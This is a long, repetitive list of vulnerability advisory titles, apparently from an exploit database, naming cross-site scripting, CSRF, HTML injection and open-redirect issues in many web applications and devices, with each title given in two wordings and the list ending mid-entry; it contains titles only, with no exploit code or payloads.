Vulnerabilities ManageEngine ServiceDesk Plus 8.0 - Persistent Cross-Site Scripting Multiple Vulnerabilities Family CMS 2.7.2 - Multiple Persistent Cross-Site Scripting Vulnerabilities Family CMS 2.7.2 - Persistent Cross-Site Scripting Multiple Vulnerabilities FCMS CMS 2.7.2 - Multiple Cross-Site Request Forgery Vulnerabilities FCMS CMS 2.7.2 - Cross-Site Request Forgery Multiple Vulnerabilities Plume CMS 1.2.4 - Multiple Persistent Cross-Site Scripting Vulnerabilities Plume CMS 1.2.4 - Persistent Cross-Site Scripting Multiple Vulnerabilities Sphinix Mobile Web Server 3.1.2.47 - Multiple Persistent Cross-Site Scripting Vulnerabilities Apache Struts - Multiple Persistent Cross-Site Scripting Vulnerabilities Sphinix Mobile Web Server 3.1.2.47 - Persistent Cross-Site Scripting Multiple Vulnerabilities Apache Struts - Persistent Cross-Site Scripting Multiple Vulnerabilities FlexCMS 3.2.1 - Multiple Cross-Site Request Forgery Vulnerabilities FlexCMS 3.2.1 - Cross-Site Request Forgery Multiple Vulnerabilities Sitecom WLM-2501 - Multiple Cross-Site Request Forgery Vulnerabilities Sitecom WLM-2501 - Cross-Site Request Forgery Multiple Vulnerabilities vBshop - Multiple Persistent Cross-Site Scripting Vulnerabilities vBshop - Persistent Cross-Site Scripting Multiple Vulnerabilities XOOPS 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities XOOPS 2.5.4 - Cross-Site Scripting Multiple Vulnerabilities Oracle GlassFish Server 3.1.1 (build 12) - Multiple Cross-Site Scripting Vulnerabilities Oracle GlassFish Server 3.1.1 (build 12) - Cross-Site Scripting Multiple Vulnerabilities WordPress Plugin Zingiri Web Shop 2.4.0 - Multiple Cross-Site Scripting Vulnerabilities WordPress Plugin Zingiri Web Shop 2.4.0 - Cross-Site Scripting Multiple Vulnerabilities WordPress 3.3.1 - Multiple Cross-Site Request Forgery Vulnerabilities WordPress 3.3.1 - Cross-Site Request Forgery Multiple Vulnerabilities Baby Gekko CMS 1.1.5c - Multiple Persistent Cross-Site Scripting Vulnerabilities Baby Gekko CMS 1.1.5c - Persistent Cross-Site Scripting Multiple Vulnerabilities Zoho BugTracker - Multiple Persistent Cross-Site Scripting Vulnerabilities Zoho BugTracker - Persistent Cross-Site Scripting Multiple Vulnerabilities T-dah Webmail Client - Multiple Persistent Cross-Site Scripting Vulnerabilities T-dah Webmail Client - Persistent Cross-Site Scripting Multiple Vulnerabilities Hivemail Webmail - Multiple Persistent Cross-Site Scripting Vulnerabilities Hivemail Webmail - Persistent Cross-Site Scripting Multiple Vulnerabilities Wiki Web Help 0.3.9 - Multiple Persistent Cross-Site Scripting Vulnerabilities XWiki 4.2-milestone-2 - Multiple Persistent Cross-Site Scripting Vulnerabilities Wiki Web Help 0.3.9 - Persistent Cross-Site Scripting Multiple Vulnerabilities XWiki 4.2-milestone-2 - Persistent Cross-Site Scripting Multiple Vulnerabilities Geeklog 1.3.5 - Multiple Cross-Site Scripting Vulnerabilities Geeklog 1.3.5 - Cross-Site Scripting Multiple Vulnerabilities Kerio MailServer 5.0/5.1 Web Mail - Multiple Cross-Site Scripting Vulnerabilities Mozilla Bonsai - Multiple Cross-Site Scripting Vulnerabilities Kerio MailServer 5.0/5.1 Web Mail - Cross-Site Scripting Multiple Vulnerabilities Mozilla Bonsai - Cross-Site Scripting Multiple Vulnerabilities SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting Multiple Vulnerabilities phpLinkat 0.1 - Multiple Cross-Site Scripting Vulnerabilities phpLinkat 0.1 - Cross-Site Scripting Multiple Vulnerabilities PHP-Nuke 5.x/6.0/6.5 Beta 1 - Multiple Cross-Site Scripting Vulnerabilities PHP-Nuke 5.x/6.0/6.5 Beta 1 - Cross-Site Scripting Multiple Vulnerabilities PHP-Nuke 6.0 - Multiple Cross-Site Scripting Vulnerabilities PHP-Nuke 6.0 - Cross-Site Scripting Multiple Vulnerabilities Endpoint Protector 4.0.4.2 - Multiple Persistent Cross-Site Scripting Vulnerabilities Endpoint Protector 4.0.4.2 - Persistent Cross-Site Scripting Multiple Vulnerabilities EZ Publish 2.2.7/3.0 - Multiple Cross-Site Scripting Vulnerabilities EZ Publish 2.2.7/3.0 - Cross-Site Scripting Multiple Vulnerabilities WebChat 2.0 - 'users.php?Database 'Username' Disclosure WebChat 2.0 - 'users.php?Database Username Disclosure PostNuke 0.723 - Multiple Cross-Site Scripting Vulnerabilities Sphera HostingDirector 1.0/2.0/3.0 VDS Control Panel - Multiple Cross-Site Scripting Vulnerabilities PostNuke 0.723 - Cross-Site Scripting Multiple Vulnerabilities Sphera HostingDirector 1.0/2.0/3.0 VDS Control Panel - Cross-Site Scripting Multiple Vulnerabilities MegaBook 1.1/2.0/2.1 - Multiple HTML Injection Vulnerabilities MegaBook 1.1/2.0/2.1 - HTML Injection Multiple Vulnerabilities m0n0wall 1.33 - Multiple Cross-Site Request Forgery Vulnerabilities m0n0wall 1.33 - Cross-Site Request Forgery Multiple Vulnerabilities Enterpriser16 Load Balancer 7.1 - Multiple Cross-Site Scripting Vulnerabilities Enterpriser16 Load Balancer 7.1 - Cross-Site Scripting Multiple Vulnerabilities Invision Power Board 1.3 - Multiple Cross-Site Scripting Vulnerabilities Invision Power Board 1.3 - Cross-Site Scripting Multiple Vulnerabilities YABB SE 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities YABB SE 1.5.1 - Cross-Site Scripting Multiple Vulnerabilities PHP-Nuke MS-Analysis Module - Multiple Cross-Site Scripting Vulnerabilities PHP-Nuke MS-Analysis Module - Cross-Site Scripting Multiple Vulnerabilities BlackBoard Learning System 5.x/6.0 - Multiple Cross-Site Scripting Vulnerabilities BlackBoard Learning System 5.x/6.0 - Cross-Site Scripting Multiple Vulnerabilities PHPX 3.x - Multiple Cross-Site Scripting Vulnerabilities PHPX 3.x - Cross-Site Scripting Multiple Vulnerabilities Adam Webb NukeJokes 1.7/2.0 Module - Multiple Cross-Site Scripting Vulnerabilities Adam Webb NukeJokes 1.7/2.0 Module - Cross-Site Scripting Multiple Vulnerabilities Liferay Enterprise Portal 1.x/2.x/5.0.2 - Multiple Cross-Site Scripting Vulnerabilities Liferay Enterprise Portal 1.x/2.x/5.0.2 - Cross-Site Scripting Multiple Vulnerabilities Crafty Syntax Live Help 2.7.3 - Multiple HTML Injection Vulnerabilities Crafty Syntax Live Help 2.7.3 - HTML Injection Multiple Vulnerabilities PHP-Nuke 6.x/7.x Reviews Module - Multiple Cross-Site Scripting Vulnerabilities PHP-Nuke 6.x/7.x Reviews Module - Cross-Site Scripting Multiple Vulnerabilities Mantis 0.x - Multiple Cross-Site Scripting Vulnerabilities Mantis 0.x - Cross-Site Scripting Multiple Vulnerabilities PHP Code Snippet Library 0.8 - Multiple Cross-Site Scripting Vulnerabilities Nagl XOOPS Dictionary Module 1.0 - Multiple Cross-Site Scripting Vulnerabilities PHP Code Snippet Library 0.8 - Cross-Site Scripting Multiple Vulnerabilities Nagl XOOPS Dictionary Module 1.0 - Cross-Site Scripting Multiple Vulnerabilities glFusion 1.2.2 - Multiple Cross-Site Scripting Vulnerabilities glFusion 1.2.2 - Cross-Site Scripting Multiple Vulnerabilities MTP Guestbook 1.0 - Multiple Cross-Site Scripting Vulnerabilities MTP Poll 1.0 - Multiple Cross-Site Scripting Vulnerabilities MTP Guestbook 1.0 - Cross-Site Scripting Multiple Vulnerabilities MTP Poll 1.0 - Cross-Site Scripting Multiple Vulnerabilities DCP-Portal 3.7/4.x/5.x - Multiple HTML Injection Vulnerabilities DCP-Portal 3.7/4.x/5.x - HTML Injection Multiple Vulnerabilities FuseTalk Forum 4.0 - Multiple Cross-Site Scripting Vulnerabilities FuseTalk Forum 4.0 - Cross-Site Scripting Multiple Vulnerabilities Mark Zuckerberg Thefacebook - Multiple Cross-Site Scripting Vulnerabilities Mark Zuckerberg Thefacebook - Cross-Site Scripting Multiple Vulnerabilities ViewGit 0.0.6 - Multiple Cross-Site Scripting Vulnerabilities ViewGit 0.0.6 - Cross-Site Scripting Multiple Vulnerabilities Vanilla Forums Van2Shout Plugin 1.0.51 - Multiple Cross-Site Request Forgery Vulnerabilities Vanilla Forums Van2Shout Plugin 1.0.51 - Cross-Site Request Forgery Multiple Vulnerabilities WorkBoard 1.2 - Multiple Cross-Site Scripting Vulnerabilities ProjectBB 0.4.5.1 - Multiple Cross-Site Scripting Vulnerabilities WorkBoard 1.2 - Cross-Site Scripting Multiple Vulnerabilities ProjectBB 0.4.5.1 - Cross-Site Scripting Multiple Vulnerabilities Exponent CMS 0.95 - Multiple Cross-Site Scripting Vulnerabilities Exponent CMS 0.95 - Cross-Site Scripting Multiple Vulnerabilities PHP-Nuke 6.x/7.x - Multiple Cross-Site Scripting Vulnerabilities PHP-Nuke 6.x/7.x - Cross-Site Scripting Multiple Vulnerabilities ZeroBoard 4.1 - Multiple Cross-Site Scripting Vulnerabilities ZeroBoard 4.1 - Cross-Site Scripting Multiple Vulnerabilities OOApp Guestbook - Multiple HTML Injection Vulnerabilities OOApp Guestbook - HTML Injection Multiple Vulnerabilities CubeCart 2.0.x - Multiple Cross-Site Scripting Vulnerabilities CubeCart 2.0.x - Cross-Site Scripting Multiple Vulnerabilities PHP Arena PAFileDB 3.1 - Multiple Cross-Site Scripting Vulnerabilities PHP Arena PAFileDB 3.1 - Cross-Site Scripting Multiple Vulnerabilities PunBB 1.2.3 - Multiple HTML Injection Vulnerabilities PunBB 1.2.3 - HTML Injection Multiple Vulnerabilities PHPOpenChat 3.0.1 - Multiple HTML Injection Vulnerabilities PHPOpenChat 3.0.1 - HTML Injection Multiple Vulnerabilities Oracle Reports Server 10g - Multiple Cross-Site Scripting Vulnerabilities Oracle Reports Server 10g - Cross-Site Scripting Multiple Vulnerabilities Nuke BookMarks 0.6 - Multiple Cross-Site Scripting Vulnerabilities Nuke BookMarks 0.6 - Cross-Site Scripting Multiple Vulnerabilities Tkai's Shoutbox - 'Query' URI redirection Tkai's Shoutbox - 'Query' Open Redirection CPG Dragonfly 9.0.2.0 - Multiple Cross-Site Scripting Vulnerabilities CPG Dragonfly 9.0.2.0 - Cross-Site Scripting Multiple Vulnerabilities Alstrasoft EPay Pro 2.0 - Multiple Cross-Site Scripting Vulnerabilities Alstrasoft EPay Pro 2.0 - Cross-Site Scripting Multiple Vulnerabilities PHP-Nuke 7.6 Web_Links Module - Multiple Cross-Site Scripting Vulnerabilities PHP-Nuke 7.6 Web_Links Module - Cross-Site Scripting Multiple Vulnerabilities Ultimate PHP Board 1.8/1.9 - Multiple Cross-Site Scripting Vulnerabilities Ultimate PHP Board 1.8/1.9 - Cross-Site Scripting Multiple Vulnerabilities PWSPHP 1.2 - Multiple Cross-Site Scripting Vulnerabilities PWSPHP 1.2 - Cross-Site Scripting Multiple Vulnerabilities Skull-Splitter Guestbook 1.0/2.0/2.2 - Multiple HTML Injection Vulnerabilities Skull-Splitter Guestbook 1.0/2.0/2.2 - HTML Injection Multiple Vulnerabilities Spread The Word - Multiple Cross-Site Scripting Vulnerabilities Spread The Word - Cross-Site Scripting Multiple Vulnerabilities Kasseler CMS 1.3.4 Lite - Multiple Cross-Site Scripting Vulnerabilities Kasseler CMS 1.3.4 Lite - Cross-Site Scripting Multiple Vulnerabilities Cerberus Helpdesk 0.97.3/2.6.1 - Multiple Cross-Site Scripting Vulnerabilities Cerberus Helpdesk 0.97.3/2.6.1 - Cross-Site Scripting Multiple Vulnerabilities Comersus Open Technologies Comersus Cart 6.0.41 - Multiple Cross-Site Scripting Vulnerabilities Comersus Open Technologies Comersus Cart 6.0.41 - Cross-Site Scripting Multiple Vulnerabilities PHPMyFAQ 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities PHPMyFAQ 1.5.1 - Cross-Site Scripting Multiple Vulnerabilities @Mail 4.0/4.13 - Multiple Cross-Site Scripting Vulnerabilities Easypx41 - Multiple Cross-Site Scripting Vulnerabilities @Mail 4.0/4.13 - Cross-Site Scripting Multiple Vulnerabilities Easypx41 - Cross-Site Scripting Multiple Vulnerabilities PHPFreeNews 1.x - Multiple Cross-Site Scripting Vulnerabilities PHPFreeNews 1.x - Cross-Site Scripting Multiple Vulnerabilities SaveWebPortal 3.4 - Multiple Cross-Site Scripting Vulnerabilities SaveWebPortal 3.4 - Cross-Site Scripting Multiple Vulnerabilities MAXdev MD-Pro 1.0.73 - Multiple Cross-Site Scripting Vulnerabilities MAXdev MD-Pro 1.0.73 - Cross-Site Scripting Multiple Vulnerabilities phpCommunityCalendar 4.0 - Multiple Cross-Site Scripting Vulnerabilities phpCommunityCalendar 4.0 - Cross-Site Scripting Multiple Vulnerabilities PHP Advanced Transfer Manager 1.30 - Multiple Cross-Site Scripting Vulnerabilities PHP Advanced Transfer Manager 1.30 - Cross-Site Scripting Multiple Vulnerabilities TellMe 1.2 - Multiple Cross-Site Scripting Vulnerabilities TellMe 1.2 - Cross-Site Scripting Multiple Vulnerabilities Comersus Backoffice Plus - Multiple Cross-Site Scripting Vulnerabilities Comersus Backoffice Plus - Cross-Site Scripting Multiple Vulnerabilities Flyspray 0.9 - Multiple Cross-Site Scripting Vulnerabilities Flyspray 0.9 - Cross-Site Scripting Multiple Vulnerabilities PBLang 4.65 - Multiple Cross-Site Scripting Vulnerabilities PBLang 4.65 - Cross-Site Scripting Multiple Vulnerabilities SAP Web Application Server 6.x/7.0 - URI redirection SAP Web Application Server 6.x/7.0 - Open Redirection PHPWCMS 1.2.5 -DEV - Multiple Cross-Site Scripting Vulnerabilities PHPWCMS 1.2.5 -DEV - Cross-Site Scripting Multiple Vulnerabilities PBLang Bulletin Board System 4.65 - Multiple HTML Injection Vulnerabilities PBLang Bulletin Board System 4.65 - HTML Injection Multiple Vulnerabilities FreeWebStat 1.0 - Multiple Cross-Site Scripting Vulnerabilities FreeWebStat 1.0 - Cross-Site Scripting Multiple Vulnerabilities NetAuctionHelp 3.0 - Multiple Cross-Site Scripting Vulnerabilities NetAuctionHelp 3.0 - Cross-Site Scripting Multiple Vulnerabilities CourseForum Technologies ProjectForum 4.7 - Multiple Cross-Site Scripting Vulnerabilities CourseForum Technologies ProjectForum 4.7 - Cross-Site Scripting Multiple Vulnerabilities AltantForum 4.0.2 - Multiple Cross-Site Scripting Vulnerabilities AltantForum 4.0.2 - Cross-Site Scripting Multiple Vulnerabilities Soft4e ECW-Cart 2.0.3 - Multiple Cross-Site Scripting Vulnerabilities Soft4e ECW-Cart 2.0.3 - Cross-Site Scripting Multiple Vulnerabilities Dick Copits PDEstore 1.8 - Multiple Cross-Site Scripting Vulnerabilities Dick Copits PDEstore 1.8 - Cross-Site Scripting Multiple Vulnerabilities Advanced Guestbook 2.x - Multiple Cross-Site Scripting Vulnerabilities Advanced Guestbook 2.x - Cross-Site Scripting Multiple Vulnerabilities Caravel CMS 3.0 Beta 1 - Multiple Cross-Site Scripting Vulnerabilities Caravel CMS 3.0 Beta 1 - Cross-Site Scripting Multiple Vulnerabilities Liferay Portal Enterprise 3.6.1 - Multiple Cross-Site Scripting Vulnerabilities Liferay Portal Enterprise 3.6.1 - Cross-Site Scripting Multiple Vulnerabilities Beehive Forum 0.6.2 - Multiple HTML Injection Vulnerabilities Beehive Forum 0.6.2 - HTML Injection Multiple Vulnerabilities ComputerOil Redakto CMS 3.2 - Multiple Cross-Site Scripting Vulnerabilities ComputerOil Redakto CMS 3.2 - Cross-Site Scripting Multiple Vulnerabilities Dell PacketTrap MSP RMM 6.6.x - Multiple Cross-Site Scripting Vulnerabilities Dell PacketTrap PSA 7.1 - Multiple Cross-Site Scripting Vulnerabilities Dell PacketTrap MSP RMM 6.6.x - Cross-Site Scripting Multiple Vulnerabilities Dell PacketTrap PSA 7.1 - Cross-Site Scripting Multiple Vulnerabilities FatWire UpdateEngine 6.2 - Multiple Cross-Site Scripting Vulnerabilities FatWire UpdateEngine 6.2 - Cross-Site Scripting Multiple Vulnerabilities Kayako SupportSuite 3.0 0.26 - Multiple Cross-Site Scripting Vulnerabilities Kayako SupportSuite 3.0 0.26 - Cross-Site Scripting Multiple Vulnerabilities Faq-O-Matic 2.711 - Multiple Cross-Site Scripting Vulnerabilities Faq-O-Matic 2.711 - Cross-Site Scripting Multiple Vulnerabilities GTP iCommerce - Multiple Cross-Site Scripting Vulnerabilities GTP iCommerce - Cross-Site Scripting Multiple Vulnerabilities CheesyBlog 1.0 - Multiple HTML Injection Vulnerabilities CheesyBlog 1.0 - HTML Injection Multiple Vulnerabilities MyBB 1.0.2 - Multiple Cross-Site Scripting Vulnerabilities MyBB 1.0.2 - Cross-Site Scripting Multiple Vulnerabilities SoftMaker Shop - Multiple Cross-Site Scripting Vulnerabilities CyberShop Ultimate E-Commerce - Multiple Cross-Site Scripting Vulnerabilities cPanel 10.8.1 - Multiple Cross-Site Scripting Vulnerabilities SoftMaker Shop - Cross-Site Scripting Multiple Vulnerabilities CyberShop Ultimate E-Commerce - Cross-Site Scripting Multiple Vulnerabilities cPanel 10.8.1 - Cross-Site Scripting Multiple Vulnerabilities Papoo 2.1.x - Multiple Cross-Site Scripting Vulnerabilities Papoo 2.1.x - Cross-Site Scripting Multiple Vulnerabilities Clever Copy 2.0/3.0 - Multiple HTML Injection Vulnerabilities Clever Copy 2.0/3.0 - HTML Injection Multiple Vulnerabilities V-Webmail 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities V-Webmail 1.6.2 - Cross-Site Scripting Multiple Vulnerabilities Dragonfly CMS 9.0.6 1 Your_Account Module - Multiple Cross-Site Scripting Vulnerabilities Dragonfly CMS 9.0.6 1 News Module - Multiple Cross-Site Scripting Vulnerabilities Dragonfly CMS 9.0.6.1 Stories_Archive Module - Multiple Cross-Site Scripting Vulnerabilities Dragonfly CMS 9.0.6.1 Web_Links Module - Multiple Cross-Site Scripting Vulnerabilities Dragonfly CMS 9.0.6.1 Surveys Module - Multiple Cross-Site Scripting Vulnerabilities Dragonfly CMS 9.0.6 1 Your_Account Module - Cross-Site Scripting Multiple Vulnerabilities Dragonfly CMS 9.0.6 1 News Module - Cross-Site Scripting Multiple Vulnerabilities Dragonfly CMS 9.0.6.1 Stories_Archive Module - Cross-Site Scripting Multiple Vulnerabilities Dragonfly CMS 9.0.6.1 Web_Links Module - Cross-Site Scripting Multiple Vulnerabilities Dragonfly CMS 9.0.6.1 Surveys Module - Cross-Site Scripting Multiple Vulnerabilities TextFileBB 1.0 - Multiple Cross-Site Scripting Vulnerabilities TextFileBB 1.0 - Cross-Site Scripting Multiple Vulnerabilities txtForum 1.0.3/1.0.4 - Multiple Cross-Site Scripting Vulnerabilities txtForum 1.0.3/1.0.4 - Cross-Site Scripting Multiple Vulnerabilities FusionZONE CouponZONE 4.2 - Multiple Cross-Site Scripting Vulnerabilities FusionZONE CouponZONE 4.2 - Cross-Site Scripting Multiple Vulnerabilities ActiveCampaign SupportTrio 2.50.2 - Multiple Cross-Site Scripting Vulnerabilities RealestateZONE 4.2 - Multiple Cross-Site Scripting Vulnerabilities ActiveCampaign SupportTrio 2.50.2 - Cross-Site Scripting Multiple Vulnerabilities RealestateZONE 4.2 - Cross-Site Scripting Multiple Vulnerabilities AL-Caricatier 2.5 - Multiple Cross-Site Scripting Vulnerabilities AL-Caricatier 2.5 - Cross-Site Scripting Multiple Vulnerabilities Bitweaver CMS 1.3 - Multiple Cross-Site Scripting Vulnerabilities Bitweaver CMS 1.3 - Cross-Site Scripting Multiple Vulnerabilities Tritanium Bulletin Board 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities Tritanium Bulletin Board 1.2.3 - Cross-Site Scripting Multiple Vulnerabilities Interaktiv.shop 4/5 - Multiple Cross-Site Scripting Vulnerabilities Interaktiv.shop 4/5 - Cross-Site Scripting Multiple Vulnerabilities Manila 9.0.1 - Multiple Cross-Site Scripting Vulnerabilities Manila 9.0.1 - Cross-Site Scripting Multiple Vulnerabilities BannerFarm 2.3 - Multiple Cross-Site Scripting Vulnerabilities BannerFarm 2.3 - Cross-Site Scripting Multiple Vulnerabilities Portal Pack 6.0 - Multiple Cross-Site Scripting Vulnerabilities Portal Pack 6.0 - Cross-Site Scripting Multiple Vulnerabilities NextAge Shopping Cart - Multiple HTML Injection Vulnerabilities PHPWebFTP 2.3 - Multiple Cross-Site Scripting Vulnerabilities NextAge Shopping Cart - HTML Injection Multiple Vulnerabilities PHPWebFTP 2.3 - Cross-Site Scripting Multiple Vulnerabilities CuteNews 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities Farsinews 2.5.3 - Multiple Cross-Site Scripting Vulnerabilities CuteNews 1.4.1 - Cross-Site Scripting Multiple Vulnerabilities Farsinews 2.5.3 - Cross-Site Scripting Multiple Vulnerabilities SunShop Shopping Cart 3.5 - Multiple Cross-Site Scripting Vulnerabilities SunShop Shopping Cart 3.5 - Cross-Site Scripting Multiple Vulnerabilities MyNews 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities MyNews 1.6.2 - Cross-Site Scripting Multiple Vulnerabilities AR-Blog 5.2 - Multiple Cross-Site Scripting Vulnerabilities vCard 2.9 - Multiple Cross-Site Scripting Vulnerabilities AR-Blog 5.2 - Cross-Site Scripting Multiple Vulnerabilities vCard 2.9 - Cross-Site Scripting Multiple Vulnerabilities Portix-PHP 2-0.3.2 Portal - Multiple Cross-Site Scripting Vulnerabilities Portix-PHP 2-0.3.2 Portal - Cross-Site Scripting Multiple Vulnerabilities DELTAScripts PHP Pro Publish 2.0 - Multiple Cross-Site Scripting Vulnerabilities DELTAScripts PHP Pro Publish 2.0 - Cross-Site Scripting Multiple Vulnerabilities vBulletin 2.x/3.x - Multiple Cross-Site Scripting Vulnerabilities Datecomm 1.1 - Multiple Cross-Site Scripting Vulnerabilities vBulletin 2.x/3.x - Cross-Site Scripting Multiple Vulnerabilities Datecomm 1.1 - Cross-Site Scripting Multiple Vulnerabilities H-Sphere 2.5.1 - Multiple Cross-Site Scripting Vulnerabilities H-Sphere 2.5.1 - Cross-Site Scripting Multiple Vulnerabilities QTO File Manager 1.0 - Multiple Cross-Site Scripting Vulnerabilities QTO File Manager 1.0 - Cross-Site Scripting Multiple Vulnerabilities PostNuke 0.6x/0.7x - Multiple Cross-Site Scripting Vulnerabilities PostNuke 0.6x/0.7x - Cross-Site Scripting Multiple Vulnerabilities D-Link DSL-2740B - Multiple Cross-Site Request Forgery Vulnerabilities D-Link DSL-2740B - Cross-Site Request Forgery Multiple Vulnerabilities BlackBoard Products 6 - Multiple HTML Injection Vulnerabilities BlackBoard Products 6 - HTML Injection Multiple Vulnerabilities BlaBla 4U - Multiple Cross-Site Scripting Vulnerabilities BlaBla 4U - Cross-Site Scripting Multiple Vulnerabilities MyBB 1.1.7 - Multiple HTML Injection Vulnerabilities MyBB 1.1.7 - HTML Injection Multiple Vulnerabilities Open-Xchange Guard 2.4.2 - Multiple Cross-Site Scripting Vulnerabilities Open-Xchange Guard 2.4.2 - Cross-Site Scripting Multiple Vulnerabilities IDevSpot BizDirectory 1.9 - Multiple Cross-Site Scripting Vulnerabilities IDevSpot BizDirectory 1.9 - Cross-Site Scripting Multiple Vulnerabilities EXPBlog 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities EXPBlog 0.3.5 - Cross-Site Scripting Multiple Vulnerabilities Yetihost Helm 3.2.10 - Multiple Cross-Site Scripting Vulnerabilities Yetihost Helm 3.2.10 - Cross-Site Scripting Multiple Vulnerabilities Sphpblog 0.8 - Multiple Cross-Site Scripting Vulnerabilities Sphpblog 0.8 - Cross-Site Scripting Multiple Vulnerabilities cPanel 11 Beta - Multiple Cross-Site Scripting Vulnerabilities cPanel 11 Beta - Cross-Site Scripting Multiple Vulnerabilities cPanel Web Hosting Manager 3.1 - Multiple Cross-Site Scripting Vulnerabilities cPanel Web Hosting Manager 3.1 - Cross-Site Scripting Multiple Vulnerabilities Omniture SiteCatalyst - Multiple Cross-Site Scripting Vulnerabilities Omniture SiteCatalyst - Cross-Site Scripting Multiple Vulnerabilities Mobilelib Gold - Multiple Cross-Site Scripting Vulnerabilities Mobilelib Gold - Cross-Site Scripting Multiple Vulnerabilities 212Cafe Board - Multiple Cross-Site Scripting Vulnerabilities Bitweaver 1.3.1 Articles and Blogs - Multiple Cross-Site Scripting Vulnerabilities 212Cafe Board - Cross-Site Scripting Multiple Vulnerabilities Bitweaver 1.3.1 Articles and Blogs - Cross-Site Scripting Multiple Vulnerabilities WordPress 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities WordPress 2.1.1 - Cross-Site Scripting Multiple Vulnerabilities Woltlab Burning Board 2.3.6 - Multiple HTML Injection Vulnerabilities Woltlab Burning Board 2.3.6 - HTML Injection Multiple Vulnerabilities WMSCMS 2.0 - Multiple Cross-Site Scripting Vulnerabilities WMSCMS 2.0 - Cross-Site Scripting Multiple Vulnerabilities TP-Link WR740N/WR740ND - Multiple Cross-Site Request Forgery Vulnerabilities TP-Link WR740N/WR740ND - Cross-Site Request Forgery Multiple Vulnerabilities phpMyAdmin 2.9.1 - Multiple Cross-Site Scripting Vulnerabilities phpMyAdmin 2.9.1 - Cross-Site Scripting Multiple Vulnerabilities Scientific-Atlanta_ Inc. DPR2320R2 - Multiple Cross-Site Request Forgery Vulnerabilities Scientific-Atlanta_ Inc. DPR2320R2 - Cross-Site Request Forgery Multiple Vulnerabilities Digirez 3.4 - Multiple Cross-Site Scripting Vulnerabilities Digirez 3.4 - Cross-Site Scripting Multiple Vulnerabilities eFront 3.6.14 (build 18012) - Multiple Persistent Cross-Site Scripting Vulnerabilities eFront 3.6.14 (build 18012) - Persistent Cross-Site Scripting Multiple Vulnerabilities Calendarix 0.7.20070307 - Multiple Cross-Site Scripting Vulnerabilities Calendarix 0.7.20070307 - Cross-Site Scripting Multiple Vulnerabilities Oliver - Multiple Cross-Site Scripting Vulnerabilities Oliver - Cross-Site Scripting Multiple Vulnerabilities ASP cvmatik 1.1 - Multiple HTML Injection Vulnerabilities ASP cvmatik 1.1 - HTML Injection Multiple Vulnerabilities Beetel TC1-450 Airtel Wireless Router - Multiple Cross-Site Request Forgery Vulnerabilities Beetel TC1-450 Airtel Wireless Router - Cross-Site Request Forgery Multiple Vulnerabilities Vigile CMS 1.8 Wiki Module - Multiple Cross-Site Scripting Vulnerabilities Vigile CMS 1.8 Wiki Module - Cross-Site Scripting Multiple Vulnerabilities Stuffed Guys Stuffed Tracker - Multiple Cross-Site Scripting Vulnerabilities Stuffed Guys Stuffed Tracker - Cross-Site Scripting Multiple Vulnerabilities Technicolor TC7200 - Multiple Cross-Site Request Forgery Vulnerabilities Technicolor TC7200 - Multiple Cross-Site Scripting Vulnerabilities Technicolor TC7200 - Cross-Site Request Forgery Multiple Vulnerabilities Technicolor TC7200 - Cross-Site Scripting Multiple Vulnerabilities pMachine Pro 2.4.1 - Multiple Cross-Site Scripting Vulnerabilities pMachine Pro 2.4.1 - Cross-Site Scripting Multiple Vulnerabilities Alcatel Lucent Omnivista 4760 - Multiple Cross-Site Scripting Vulnerabilities SocketKB 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities Alcatel Lucent Omnivista 4760 - Cross-Site Scripting Multiple Vulnerabilities SocketKB 1.1.5 - Cross-Site Scripting Multiple Vulnerabilities Seagate BlackArmor NAS sg2000-2000.1331 - Multiple Persistent Cross-Site Scripting Vulnerabilities Seagate BlackArmor NAS sg2000-2000.1331 - Persistent Cross-Site Scripting Multiple Vulnerabilities Flyspray 0.9.9 - Multiple Cross-Site Scripting Vulnerabilities Flyspray 0.9.9 - Cross-Site Scripting Multiple Vulnerabilities AwesomeTemplateEngine 1 - Multiple Cross-Site Scripting Vulnerabilities AwesomeTemplateEngine 1 - Cross-Site Scripting Multiple Vulnerabilities Snitz Forums 2000 3.4.5/3.4.6 - Multiple Cross-Site Scripting Vulnerabilities Snitz Forums 2000 3.4.5/3.4.6 - Cross-Site Scripting Multiple Vulnerabilities Joomla! Component SMF Forum 1.1.4 - Multiple Cross-Site Scripting Vulnerabilities Joomla! Component SMF Forum 1.1.4 - Cross-Site Scripting Multiple Vulnerabilities DevTracker Module For bcoos 1.1.11 and E-xoops 1.0.8 - Multiple Cross-Site Scripting Vulnerabilities DevTracker Module For bcoos 1.1.11 and E-xoops 1.0.8 - Cross-Site Scripting Multiple Vulnerabilities e107 CMS 0.7 - Multiple Cross-Site Scripting Vulnerabilities e107 CMS 0.7 - Cross-Site Scripting Multiple Vulnerabilities Jeebles Directory 2.9.60 - Multiple Cross-Site Scripting Vulnerabilities Jeebles Directory 2.9.60 - Cross-Site Scripting Multiple Vulnerabilities IBM Rational ClearQuest 7.0 - Multiple Cross-Site Scripting Vulnerabilities IBM Rational ClearQuest 7.0 - Cross-Site Scripting Multiple Vulnerabilities DivXDB 2002 0.94b - Multiple Cross-Site Scripting Vulnerabilities DivXDB 2002 0.94b - Cross-Site Scripting Multiple Vulnerabilities QT-cute QuickTalk Guestbook 1.6 - Multiple Cross-Site Scripting Vulnerabilities QT-cute QuickTalk Guestbook 1.6 - Cross-Site Scripting Multiple Vulnerabilities osCommerce 2.1/2.2 - Multiple Cross-Site Scripting Vulnerabilities osCommerce 2.1/2.2 - Cross-Site Scripting Multiple Vulnerabilities Tux CMS 0.1 - Multiple Cross-Site Scripting Vulnerabilities Tux CMS 0.1 - Cross-Site Scripting Multiple Vulnerabilities Horde Turba 3.1.7 - Multiple Cross-Site Scripting Vulnerabilities Horde Turba 3.1.7 - Cross-Site Scripting Multiple Vulnerabilities SchoolCenter 7.5 - Multiple Cross-Site Scripting Vulnerabilities SchoolCenter 7.5 - Cross-Site Scripting Multiple Vulnerabilities Hot Links SQL-PHP - Multiple Cross-Site Scripting Vulnerabilities Hot Links 